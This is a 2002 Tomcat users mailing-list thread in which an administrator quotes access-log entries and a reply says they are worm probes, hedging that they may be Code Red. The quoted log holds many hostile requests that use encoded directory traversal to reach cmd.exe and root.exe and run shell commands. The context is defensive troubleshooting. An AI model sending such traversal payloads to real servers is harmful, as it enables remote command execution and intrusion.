tomcat-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Rob A. Augustinus" <devi...@siulintao.net>
Subject RE: Tomcat log entries
Date Mon, 30 Dec 2002 08:39:41 GMT

These are typical 'code red' (afaik?) entries in your log.. 
Some infected server is still trying to infect your server,
not that it will be infected but it will try for a certain 
amount of times at least. You could create a valid link to 
a null sized file to handle it. Which causes less load on
your system than an 404. other than that.. There's little
to be done about it.. (unless you can track down the admin
of that box, and tell him to fix his server)

Rob

-----Original Message-----
From: Laszlo Nadai [mailto:lnadai@jnet1.com] 
Sent: Sunday, December 29, 2002 5:39
To: 'Tomcat Users List'
Subject: Tomcat log entries


I am fairly new to Tomcat, scripts, etc.
I found the following and similar entries in my access log file:

64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 624 64.160.45.159 - -
[28/Dec/2002:15:00:17 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404
618 64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648 64.160.45.159 - -
[28/Dec/2002:15:00:18 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 648 64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718
64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721
64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715
64.160.45.159 - - [28/Dec/2002:16:01:56 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 624 64.160.45.159 - -
[28/Dec/2002:16:01:56 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404
618 64.160.45.159 - - [28/Dec/2002:16:01:58 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648 64.160.45.159 - -
[28/Dec/2002:16:02:00 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 648 64.160.45.159 - - [28/Dec/2002:16:02:04 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718
64.160.45.159 - - [28/Dec/2002:16:02:06 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:16:02:07 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:16:02:09 -0800] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721
64.160.45.159 - - [28/Dec/2002:16:02:10 -0800] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715
64.165.213.97 - - [28/Dec/2002:16:38:12 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 624 64.165.213.97 - -
[28/Dec/2002:16:38:16 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404
618 64.165.213.97 - - [28/Dec/2002:16:38:20 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648 64.165.213.97 - -
[28/Dec/2002:16:38:24 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 648

Can someone tell me what someone else was trying to do?
Based on the log, should I change any settings in my config?

Thanks,
laszlo


-
[This E-mail scanned for viruses by declude AntiVirus Software]


--
To unsubscribe, e-mail:
<mailto:tomcat-user-unsubscribe@jakarta.apache.org>
For additional commands, e-mail:
<mailto:tomcat-user-help@jakarta.apache.org>


--
To unsubscribe, e-mail:   <mailto:tomcat-user-unsubscribe@jakarta.apache.org>
For additional commands, e-mail: <mailto:tomcat-user-help@jakarta.apache.org>


Mime
View raw message